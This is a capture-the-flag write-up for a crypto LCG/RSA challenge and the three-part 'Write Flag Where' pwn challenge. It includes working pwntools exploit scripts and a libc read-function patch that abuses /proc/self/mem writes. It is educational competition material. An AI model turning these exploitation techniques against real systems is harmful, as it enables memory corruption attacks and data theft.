If no modulus is provided, attempts to recover the modulus from the outputs (may require many outputs).
If no multiplier is provided, attempts to recover the multiplier from the outputs (requires at least 3 outputs).
If no increment is provided, attempts to recover the increment from the outputs (requires at least 2 outputs).
:param y: the sequential output values obtained from the LCG
:param m: the modulus of the LCG (can be None)
:param a: the multiplier of the LCG (can be None)
:param c: the increment of the LCG (can be None)
:return: a tuple containing the modulus, multiplier, and the increment
"""
if m is None:
assert len(y) >= 4, "At least 4 outputs are required to recover the modulus"
for i in range(len(y) - 3):
d0 = y[i + 1] - y[i]
d1 = y[i + 2] - y[i + 1]
d2 = y[i + 3] - y[i + 2]
g = d2 * d0 - d1 * d1
m = g if m is None else gcd(g, m)
#assert is_prime_power(m), "Modulus must be a prime power, try providing more outputs"
gf = Zmod(m)
if a is None:
assert len(y) >= 3, "At least 3 outputs are required to recover the multiplier"
x0 = gf(y[0])
x1 = gf(y[1])
x2 = gf(y[2])
a = int((x2 - x1) / (x1 - x0))
if c is None:
assert len(y) >= 2, "At least 2 outputs are required to recover the multiplier"
x0 = gf(y[0])
x1 = gf(y[1])
c = int(x1 - a * x0)
return m, a, c
lcg = list(map(int, open("dump.txt", "r").read().split()))
seed = 211286818345627549183608678726370412218029639873054513839005340650674982169404937862395980568550063504804783328450267566224937880641772833325018028629959635
lcg = [seed] + lcg
print(lcg)
m, a, c = attack(lcg)
print(m, a, c)
# verify output
for i in range(len(lcg) - 1):
assert (a*lcg[i]+c)%m == lcg[i+1]
# taken from generate.py
class LCG:
global m, a, c
lcg_m = a
lcg_c = c
lcg_n = m
def __init__(self, lcg_s):
self.state = lcg_s
def next(self):
self.state = (self.state * self.lcg_m + self.lcg_c) % self.lcg_n
return self.state
# Find prime value of specified bits a specified amount of times
seed = 211286818345627549183608678726370412218029639873054513839005340650674982169404937862395980568550063504804783328450267566224937880641772833325018028629959635
lcg = LCG(seed)
primes_arr = []
dump = False
items = 0
#dump_file = open("dump.txt", "w")
primes_n = 1
while True:
for i in range(8):
while True:
prime_candidate = lcg.next()
if dump:
dump_file.write(str(prime_candidate) + '\n')
items += 1
if items == 6:
dump = False
dump_file.close()
if not isPrime(prime_candidate):
continue
elif prime_candidate.bit_length() != 512:
continue
else:
primes_n *= prime_candidate
primes_arr.append(prime_candidate)
break
# Check bit length
if primes_n.bit_length() > 4096:
print("bit length", primes_n.bit_length())
primes_arr.clear()
primes_n = 1
continue
else:
break
# Create public key 'n'
n = 1
for j in primes_arr:
n *= j
print("[+] Public Key: ", n)
print("[+] size: ", n.bit_length(), "bits")
# now decrypt the flag with p and q
print(primes_arr)
phi = 1
for k in primes_arr:
phi *= (k - 1)
key = RSA.importKey(open("public.pem", "rb").read())
print(key.e, key.n)
print(key.n == n)
e = key.e
d = pow(e, -1, phi)
c = int.from_bytes(open("flag.txt", "rb").read(), "little")
print(c)
print(long_to_bytes(pow(c, d, n)))
Pwn
Write Flag Where - Overview
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
Part1:
This challenge is not a classical pwn
In order to solve it will take skills of your own
An excellent primitive you get for free
Choose an address and I will write what I see
But the author is cursed or perhaps it's just out of spite
For the flag that you seek is the thing you will write
ASLR isn't the challenge so I'll tell you what
I'll give you my mappings so that you'll have a shot.
Part2:
Was that too easy? Let's make it tough
It's the challenge from before, but I've removed all the fluff
Part3:
Your skills are considerable, I'm sure you'll agree
But this final level's toughness fills me with glee
No writes to my binary, this I require
For otherwise I will surely expire
nc wfw[123].2023.ctfcompetition.com 1337
solves 294 / 155 / 43
From reversing the challenge, we can quickly identify the behavior. The challenge first output the process map, allowing us to know pie, libc, and stack addresses. It then close stdin/stdout/stderr, and only accept inputs from fd 1337. Lastly, the challenge goes into a while loop, taking an address and a count, then write count number of bytes of flag to the specified address. Note that the flag is written by writting directly to the process memory file, so all addresses are writable, including the code themselves. This will be handy for part 3.
The decompiled code from ghidra for part 3, with some modification to reflect each level:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
int main(){
local_c = open("/proc/self/maps",0);
read(local_c,maps,0x1000);
close(local_c);
local_10 = open("./flag.txt",0);
if (local_10 == -1) {
puts("flag.txt not found");
}
else {
sVar2 = read(local_10,flag,0x80);
if (0 < sVar2) {
close(local_10);
local_14 = dup2(1,0x539);
local_18 = open("/dev/null",2);
dup2(local_18,0);
dup2(local_18,1);
dup2(local_18,2);
close(local_18);
alarm(0x3c);
dprintf(local_14,
"Your skills are considerable, I\'m sure you\'ll agree\nBut this final level\'s toughn ess fills me with glee\nNo writes to my binary, this I require\nFor otherwise I will s urely expire\n"
);
dprintf(local_14,"%s\n\n",maps);
while( true ) {
// dprintf(local_14,"Give me an address and a length just so:\n<address> <length>\nAnd I\'ll write it wh erever you want it to go.\nIf an exit is all that you desire\nSend me nothing and I will happily expire\n"); // part 1
local_78 = 0;
local_70 = 0;
local_68 = 0;
local_60 = 0;
local_58 = 0;
local_50 = 0;
local_48 = 0;
local_40 = 0;
sVar2 = read(local_14,&local_78,0x40);
local_1c = (undefined4)sVar2;
iVar1 = __isoc99_sscanf(&local_78,"0x%llx %u",&local_28,&local_2c);
// if (((iVar1 != 2) || (0x7f < local_2c))) // part 2
if (((iVar1 != 2) || (0x7f < local_2c)) || ((main - 0x5000 < local_28 && (local_28 < main + 0x5000)))) // part 3
break;
local_20 = open("/proc/self/mem",2);
lseek64(local_20,local_28,0);
write(local_20,flag,(ulong)local_2c);
close(local_20);
}
/* WARNING: Subroutine does not return */
exit(0);
}
puts("flag.txt empty");
}
return 1;
}
Write Flag Where - Part 1
For part 1, there is a dprintf function call after the entrence to the while loop, so writing the flag to the string that are printed each loop can leak the flag.
CTF{Y0ur_j0urn3y_is_0n1y_ju5t_b39innin9}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
from pwn import *
elf = ELF("./chal_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-2.35.so")
context.binary = elf
context.terminal = ["tmux", "splitw", "-h"]
def connect():
nc_str = "nc wfw1.2023.ctfcompetition.com 1337"
_, host, port = nc_str.split(" ")
p = remote(host, int(port))
return p
def main():
p = connect()
p.recvuntil(b"shot.\n")
s = p.recvline()
elf.address = int(s.split(b'-')[0], 16)
print(hex(elf.address))
p.sendline(f"{hex(elf.address + 0x21e0)} 60")
p.interactive()
if __name__ == "__main__":
main()
Write Flag Where - Part 2
Part 2 proves to be trickier. In ghidra, the exit call stopped the decompiler from disassembling the code further, therefore missing a dprintf function call after the exit(0) call. Instead, I tried to leak the flag using the sscanf function with the string 0x%llx %u.
The sscanf function call will attempt to match the input format string from the input string. In the original challenge, it’s trying to match the starting 0x before reading the hex numbers as input. For example, if we overwrite the format string to Cx%llx %u and send the input Cx0 0, the program will continue normally, but input Dx0 0 will exit immediately after. Therefore, we can overwrite that string, then attempt to read different strings, leaking the flag byte by byte. See solve2.py for implementation details.
CTF{impr355iv3_6ut_can_y0u_s01v3_cha113ng3_3?}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
#!/usr/bin/python3
from pwn import *
elf = ELF("./chal_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-2.35.so")
context.binary = elf
context.terminal = ["tmux", "splitw", "-h"]
def connect():
nc_str = "nc wfw2.2023.ctfcompetition.com 1337"
_, host, port = nc_str.split(" ")
p = remote(host, int(port))
return p
def attempt(cur_flag, ch):
p = connect()
p.recvuntil(b"fluff\n")
elf.address = int(p.recvline().split(b'-')[0], 16)
for i in range(6):
p.recvline()
libc.address = int(p.recvline().split(b'-')[0], 16)
for i in range(11):
p.recvline()
stack_base = int(p.recvline().split(b'-')[0], 16)
for i in range(5):
p.recvline()
# print(hex(elf.address), hex(libc.address), hex(stack_base))
count = len(cur_flag)+1
target_address = elf.address+0x20bc-(count-1)
overwrite_str = hex(target_address)
p.sendline(f"{overwrite_str} {count}")
overwrite_str = hex(target_address)
p.sendline(f"{ch}{overwrite_str[1:]} {count}")
overwrite_str = hex(target_address)
p.sendline(f"-{overwrite_str[1:]} {count}")
try:
p.recv(1, timeout=1)
except Exception:
p.close()
return False
p.close()
return True
def main():
context.log_level='critical'
FLAG = "CTF{"
for l in range(100):
for c in "_"+string.printable[:-7]:
print(FLAG+c)
if attempt(FLAG, c):
FLAG+=c
break
if FLAG[-1] == "}":
break
print(FLAG)
if __name__ == "__main__":
main()
Write Flag Where - Part 3
Lastly for part 3, we can’t write into the main binary region, including the all the data sections. After looking through the functions in libc that are used, I found that the read function is the most likely function to be hijacked, since the arguments used to call the function is helpful.
Meanwhile, I also look for some useful instructions we can create using the flag prefix. I notice that 0x43 (‘C’) is a prefix in x86 assembly, and can be used to nop out instruction with minimal effects on most registers. Another interesting instruction is 0x7b (‘{‘), which is jnp. This allow use to jmp further down the program. The changes made to the read function is as follow:
- Overwrite the second syscall to set rsi from rsp+0x43
- Overwrite ja after second syscall to jnp to jump downward
- Overwrite jump direction of the last jmp to jump to write function
- Overwrite broken instructions with nop so it doesn’t segfault
- Overwrite the first return in the read function to trigger the full exploit.
see libc_original.asm for the original libc function (disassembled from ghidra), and libc_changed.asm for the final state after all the writes, along with some comments to how the final payload achieved the target.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
// ssize_t read(int __fd,void *__buf,size_t __nbytes)
00214980 f3 0f 1e fa ENDBR64
00214984 64 8b 04 MOV EAX,dword ptr FS:[0x18]
25 18 00
00 00
0021498c 85 c0 TEST EAX,EAX
0021498e 75 10 JNZ LAB_002149a0
00214990 0f 05 SYSCALL
00214992 48 3d 00 CMP RAX,-0x1000
f0 ff ff
00214998 77 56 JA LAB_002149f0
0021499a c3 RET
0021499b 0f ?? 0Fh
0021499c 1f ?? 1Fh
0021499d 44 ?? 44h D
0021499e 00 ?? 00h
0021499f 00 ?? 00h
LAB_002149a0
002149a0 48 83 ec 28 SUB RSP,0x28
002149a4 48 89 54 MOV qword ptr [RSP + local_10],__nbytes
24 18
002149a9 48 89 74 MOV qword ptr [RSP + local_18],__buf
24 10
002149ae 89 7c 24 08 MOV dword ptr [RSP + local_20],__fd
002149b2 e8 b9 c0 CALL __pthread_enable_asynccancel
f7 ff
002149b7 48 8b 54 MOV __nbytes,qword ptr [RSP + local_10]
24 18
002149bc 48 8b 74 MOV __buf,qword ptr [RSP + local_18]
24 10
002149c1 41 89 c0 MOV R8D,EAX
002149c4 8b 7c 24 08 MOV __fd,dword ptr [RSP + local_20]
002149c8 31 c0 XOR EAX,EAX
002149ca 0f 05 SYSCALL
002149cc 48 3d 00 CMP RAX,-0x1000
f0 ff ff
002149d2 77 34 JA LAB_00214a08
LAB_002149d4
002149d4 44 89 c7 MOV __fd,R8D
002149d7 48 89 44 MOV qword ptr [RSP + local_20],RAX
24 08
002149dc e8 ff c0 CALL __pthread_disable_asynccancel
f7 ff
002149e1 48 8b 44 MOV RAX,qword ptr [RSP + local_20]
24 08
002149e6 48 83 c4 28 ADD RSP,0x28
002149ea c3 RET
002149eb 0f ?? 0Fh
002149ec 1f ?? 1Fh
002149ed 44 ?? 44h D
002149ee 00 ?? 00h
002149ef 00 ?? 00h
LAB_002149f0
002149f0 48 8b 15 MOV __nbytes,qword ptr [PTR_00318e10]
19 44 10 00
002149f7 f7 d8 NEG EAX
002149f9 64 89 02 MOV dword ptr FS:[__nbytes],EAX
002149fc 48 c7 c0 MOV RAX,-0x1
ff ff ff ff
00214a03 c3 RET
00214a04 0f ?? 0Fh
00214a05 1f ?? 1Fh
00214a06 40 ?? 40h @
00214a07 00 ?? 00h
LAB_00214a08
00214a08 48 8b 15 MOV __nbytes,qword ptr [PTR_00318e10]
01 44 10 00
00214a0f f7 d8 NEG EAX
00214a11 64 89 02 MOV dword ptr FS:[__nbytes],EAX
00214a14 48 c7 c0 MOV RAX,-0x1
ff ff ff ff
00214a1b eb b7 JMP LAB_002149d4
00214a1d 0f ?? 0Fh
00214a1e 1f ?? 1Fh
// ssize_t write(int __fd,void *__buf,size_t __n)
00214a20 f3 0f 1e fa ENDBR64
00214a24 64 8b 04 MOV EAX,dword ptr FS:[0x18]
25 18 00
00 00
00214a2c 85 c0 TEST EAX,EAX
00214a2e 75 10 JNZ LAB_00214a40
00214a30 b8 01 00 MOV EAX,0x1
00 00
00214a35 0f 05 SYSCALL
00214a37 48 3d 00 CMP RAX,-0x1000
f0 ff ff
00214a3d 77 51 JA LAB_00214a90
00214a3f c3 RET
LAB_00214a40
00214a40 48 83 ec 28 SUB RSP,0x28
00214a44 48 89 54 MOV qword ptr [RSP + local_10],__n
24 18
00214a49 48 89 74 MOV qword ptr [RSP + local_18],__buf
24 10
00214a4e 89 7c 24 08 MOV dword ptr [RSP + local_20],__fd
00214a52 e8 19 c0 CALL __pthread_enable_asynccancel
f7 ff
00214a57 48 8b 54 MOV __n,qword ptr [RSP + local_10]
24 18
00214a5c 48 8b 74 MOV __buf,qword ptr [RSP + local_18]
24 10
00214a61 41 89 c0 MOV R8D,EAX
00214a64 8b 7c 24 08 MOV __fd,dword ptr [RSP + local_20]
00214a68 b8 01 00 MOV EAX,0x1
00 00
00214a6d 0f 05 SYSCALL
00214a6f 48 3d 00 CMP RAX,-0x1000
f0 ff ff
00214a75 77 31 JA LAB_00214aa8
LAB_00214a77
00214a77 44 89 c7 MOV __fd,R8D
00214a7a 48 89 44 MOV qword ptr [RSP + local_20],RAX
24 08
00214a7f e8 5c c0 CALL __pthread_disable_asynccancel
f7 ff
00214a84 48 8b 44 MOV RAX,qword ptr [RSP + local_20]
24 08
00214a89 48 83 c4 28 ADD RSP,0x28
00214a8d c3 RET
00214a8e 66 ?? 66h f
00214a8f 90 ?? 90h
LAB_00214a90
00214a90 48 8b 15 MOV __n,qword ptr [PTR_00318e10]
79 43 10 00
00214a97 f7 d8 NEG EAX
00214a99 64 89 02 MOV dword ptr FS:[__n],EAX
00214a9c 48 c7 c0 MOV RAX,-0x1
ff ff ff ff
00214aa3 c3 RET
00214aa4 0f ?? 0Fh
00214aa5 1f ?? 1Fh
00214aa6 40 ?? 40h @
00214aa7 00 ?? 00h
LAB_00214aa8
00214aa8 48 8b 15 MOV __n,qword ptr [PTR_00318e10]
61 43 10 00
00214aaf f7 d8 NEG EAX
00214ab1 64 89 02 MOV dword ptr FS:[__n],EAX
00214ab4 48 c7 c0 MOV RAX,-0x1
ff ff ff ff
00214abb eb ba JMP LAB_00214a77
00214abd 0f ?? 0Fh
00214abe 1f ?? 1Fh
00214abf 00 ?? 00h
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
0x7fca9f372980 <read>: endbr64
0x7fca9f372984 <read+4>: mov eax,DWORD PTR fs:0x18
0x7fca9f37298c <read+12>: test eax,eax
0x7fca9f37298e <read+14>: jne 0x7fca9f3729a0 <read+32>
// read payload so that rsp+0x43 = flag location
0x7fca9f372990 <read+16>: syscall
0x7fca9f372992 <read+18>: cmp rax,0xfffffffffffff000
0x7fca9f372998 <read+24>: ja 0x7fca9f3729f0 <read+112>
//was ret, overwrite to start payload
0x7fca9f37299a <read+26>: rex.XB
0x7fca9f37299b <read+27>: rex.XB //C
0x7fca9f37299c <read+28>: rex.XB //C
0x7fca9f37299d <read+29>: rex.XB //C
0x7fca9f37299e <read+30>: rex.XB //C
0x7fca9f37299f <read+31>: rex.XB //C
0x7fca9f3729a0 <read+32>: sub rsp,0x28
0x7fca9f3729a4 <read+36>: mov QWORD PTR [rsp+0x18],rdx
0x7fca9f3729a9 <read+41>: mov QWORD PTR [rsp+0x10],rsi
0x7fca9f3729ae <read+46>: mov DWORD PTR [rsp+0x8],edi
0x7fca9f3729b2 <read+50>: rex.XB //C
0x7fca9f3729b3 <read+51>: rex.XB //C
0x7fca9f3729b4 <read+52>: rex.XB //C
0x7fca9f3729b5 <read+53>: rex.XB //C
0x7fca9f3729b6 <read+54>: rex.XB //C
0x7fca9f3729b7 <read+55>: mov rdx,QWORD PTR [rsp+0x18]
//C, load flag location into rsi
0x7fca9f3729bc <read+60>: mov rsi,QWORD PTR [rsp+0x43]
0x7fca9f3729c1 <read+65>: mov r8d,eax
0x7fca9f3729c4 <read+68>: mov edi,DWORD PTR [rsp+0x8]
0x7fca9f3729c8 <read+72>: xor eax,eax
// read CT, rax = 2, cmp gives no parity, jmp
0x7fca9f3729ca <read+74>: syscall
0x7fca9f3729cc <read+76>: cmp rax,0x7b465443 //CTF{ {
0x7fca9f3729d2 <read+82>: jnp 0x7fca9f372a08 <read+136>
[...]
0x7fca9f372a08 <read+136>: rex.XB //C
0x7fca9f372a09 <read+137>: rex.XB //C
0x7fca9f372a0a <read+138>: rex.XB //C
0x7fca9f372a0b <read+139>: rex.XB //C
0x7fca9f372a0c <read+140>: rex.XB //C
0x7fca9f372a0d <read+141>: rex.XB //C
0x7fca9f372a0e <read+142>: rex.XB neg r8d
0x7fca9f372a11 <read+145>: mov DWORD PTR fs:[rdx],eax
0x7fca9f372a14 <read+148>: mov rax,0xffffffffffffffff
0x7fca9f372a1b <read+155>: jmp 0x7fca9f372a60 <write+64> //C
[...]
0x7fca9f372a60 <write+64>: rex.XB //C
0x7fca9f372a61 <write+65>: mov r8d,eax
// write 1337, flag, 0x40
0x7fca9f372a64 <write+68>: mov edi,DWORD PTR [rsp+0x8]
0x7fca9f372a68 <write+72>: mov eax,0x1
0x7fca9f372a6d <write+77>: syscall
[...]
After overwriting the first return, I control the input to the read syscall to manipulate the content in rsp+0x43, and write the flag location there, so the write syscall will leak out the flag. To overcome the issue of no output, I add a sleep between each input to make sure the remove server have enough time to process each input. A better solution will be to pad each input to 0x40 bytes, then no delay will be needed. The solve script is in solve3.py.
CTF{y0ur_3xpl0itati0n_p0w3r_1s_0v3r_9000!!}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
from pwn import *
import time
elf = ELF("./chal_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-2.35.so")
context.binary = elf
context.terminal = ["tmux", "splitw", "-h"]
def connect():
if args.REMOTE:
nc_str = "nc wfw3.2023.ctfcompetition.com 1337"
_, host, port = nc_str.split(" ")
p = remote(host, int(port))
else:
os.system("ulimit -n 2048")
p = process([elf.path], preexec_fn = lambda: os.dup2(0, 1337))
if args.GDB:
gdb_script = """
b *main+638
c 20
"""
gdb.attach(p, gdb_script)
return p
def main():
p = connect()
def write(addr, len):
#p.stdout.write(f'0x{addr:x} {len}\n'.encode())
p.sendline(f'0x{addr:x} {len}'.encode())
time.sleep(0.5)
libc_found = False
elf_found = False
while True:
line = p.recvline().decode('ascii').strip()
if 'chal' in line and not elf_found:
elf_base = int(line.split()[0].split('-')[0], 16)
elf_found = True
if line.endswith('libc.so.6') and not libc_found:
libc_base = int(line.split()[0].split('-')[0], 16)
libc_found = True
if line.endswith('[stack]'):
stack_bottom = int(line.split()[0].split('-')[1], 16)
break
print(hex(elf_base))
print(hex(libc_base))
print(hex(stack_bottom))
input_buf_offset = 5856
for i in range(0x1149b2, 0x1149b7):
write(libc_base + i, 1)
for i in range(0x114a08, 0x114a0f):
write(libc_base + i, 1)
write(libc_base + 0x114a60, 1)
write(libc_base + 0x1149cf, 4)
write(libc_base + 0x1149ce, 4)
write(libc_base + 0x114a1c, 1)
write(libc_base + 0x1149c0, 1)
write(libc_base + 0x11499f, 1)
write(libc_base + 0x11499e, 1)
write(libc_base + 0x11499d, 1)
write(libc_base + 0x11499c, 1)
write(libc_base + 0x11499b, 1)
write(libc_base + 0x11499a, 1)
p.send(("a"*0x13).encode()+p64(elf_base + 0x50a0))
time.sleep(0.5)
p.send(b"CT")
p.interactive()
if __name__ == "__main__":
main()
#CTF{y0ur_3xpl0itati0n_p0w3r_1s_0v3r_9000!!}